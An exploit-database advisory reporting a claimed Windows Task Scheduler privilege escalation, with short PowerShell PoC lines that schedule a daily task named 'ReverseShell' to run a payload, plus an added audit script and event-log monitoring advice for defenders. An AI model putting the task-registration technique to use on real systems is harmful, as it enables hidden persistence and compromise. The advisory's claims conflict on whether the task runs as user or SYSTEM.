Social Engineering Neo - 1337DAY-ID-32976
Jul 14, 2019 - 12:00 a.m.

Microsoft Windows Task Scheduler Privilege Escalation Vulnerability

0day.today

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI, and MMC snap-ins (via mmc.exe) elevate automatically without a UAC prompt, potentially leading to unintentional elevation of privilege.

# Exploit Title: Microsoft Windows Task Scheduler Privilege Escalation 
# Date: 10/7/19
# Exploit Author: Social Engineering Neo
# Version: Windows 7 SP1 → Windows 10 1903
# Tested on: 7 SP1, 10 1809 & 1903


#    Microsoft Windows Task Scheduler EoP Report by Social Engineering Neo.
#
#    Normal Users are able to Trigger Programs at Intervals on any Account on the Host System/Domain without Proper Authorization.
#    Read our in depth report @ https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_Report.txt 

#Platform:
#
#    Windows 7 SP1, Windows 10 (1809 & 1903), All versions in between are likely to be affected.
#    Tested on the most recent security patch. (July 2019)


#Class:
#
#    Improper Authorization (CWE-285).
#    Remote Code Execution.

#Proof of Concept: -

#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger =  New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."


#CLI NOTE: - We have not put much time/effort into the script-based PoC, we encourage a skilled programmer to elaborate on this further;)
#        : - PoC will run task with "user" permissions.
#        : - You obviously need your own payload and configure accordingly.


#VIDEO: -    https://youtu.be/z2C-IykCfbk **updated**
#     : -    https://youtu.be/_leFNyo5wxM *original*



#Expected Result: -
#
#    Normal users should not be able to run tasks as other users and execute programs on accounts without proper authorization.


#Observed Result: -
#
#    Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromise.



#NOTE: - We reported this issue to Microsoft.
#    : - According to Microsoft, this functionality is considered "By Design" & they have no intent to service this issue.
#    : - Have a read @ https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
#    : - We (Social Engineering Neo) consider this as a PoC rather than an actual exploit.
#    : - Because the payload was being loaded through Task Scheduler, the user will have no knowledge the payload is being run. (even if they checked)
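#
# Since Microsoft treats task registration by standard users as by-design behaviour, the practical response is to audit and monitor it rather than wait for a patch. The PowerShell audit helper below is added here and is not part of the advisory or its PoC: it assumes Windows 8 / Server 2012 or later (where the ScheduledTasks module used above exists) and uses a constructed, adjustable path pattern to flag registered tasks whose action launches an executable from a user profile, such as the C:\Users\...\Documents\payload-x64.exe task the PoC registers, together with the principal each one runs as.

```powershell
# Added audit helper, not the advisory's code. Lists scheduled tasks whose
# action executes a binary from a user-writable profile path and shows the
# account and run level they execute under. Run from an elevated session so
# that tasks registered by other principals are enumerated as well.
Import-Module ScheduledTasks

function Find-UserProfileTasks {
    [CmdletBinding()]
    param(
        # Constructed default: anything under <drive>:\Users\ is treated as
        # user-writable. Extend the pattern for other writable locations.
        [string]$WritablePathPattern = '^[A-Za-z]:\\Users\\'
    )

    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only exec actions carry an Execute path; COM handler actions do not.
            $exe = $action.Execute
            if (-not $exe) { continue }

            # Expand %USERPROFILE% and friends so "%USERPROFILE%\x.exe" is caught
            # as well, and strip surrounding quotes before matching.
            $expanded = [Environment]::ExpandEnvironmentVariables($exe.Trim('"'))
            if ($expanded -match $WritablePathPattern) {
                [pscustomobject]@{
                    Task      = $task.TaskPath + $task.TaskName
                    Author    = $task.Author
                    RunAsUser = $task.Principal.UserId
                    RunLevel  = $task.Principal.RunLevel
                    LogonType = $task.Principal.LogonType
                    State     = $task.State
                    Execute   = $expanded
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

# Report, with tasks that run as SYSTEM or with the highest run level first,
# since those are the ones whose payload would not stay at "user" permissions.
Find-UserProfileTasks |
    Sort-Object @{ Expression = { $_.RunAsUser -eq 'SYSTEM' -or $_.RunLevel -eq 'Highest' }; Descending = $true } |
    Format-Table -AutoSize
```

For continuous monitoring rather than a point-in-time sweep, forward Security event 4698 (a scheduled task was created; requires the "Audit Other Object Access Events" subcategory) and Microsoft-Windows-TaskScheduler/Operational event 106 (task registered) to the SIEM and alert when the registering user is not an administrator or the action path falls under a user profile.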


#TIMELINE: - Discovery         5th July 2019
#        : - Initial Report    5th July 2019
#        : - Case Opened       8th July 2019
#        : - Added Detail      8th July 2019    *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
#        : - MSRC Response     9th July 2019
#        : - Our Response      9th July 2019
#        : - Case Closed       9th July 2019
#        : - MSRC Response     9th July 2019
#        : - Our Response      9th July 2019    *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)
#
#        : - We thank the MSRC team for their quick response.

#  0day.today [2019-12-04]  #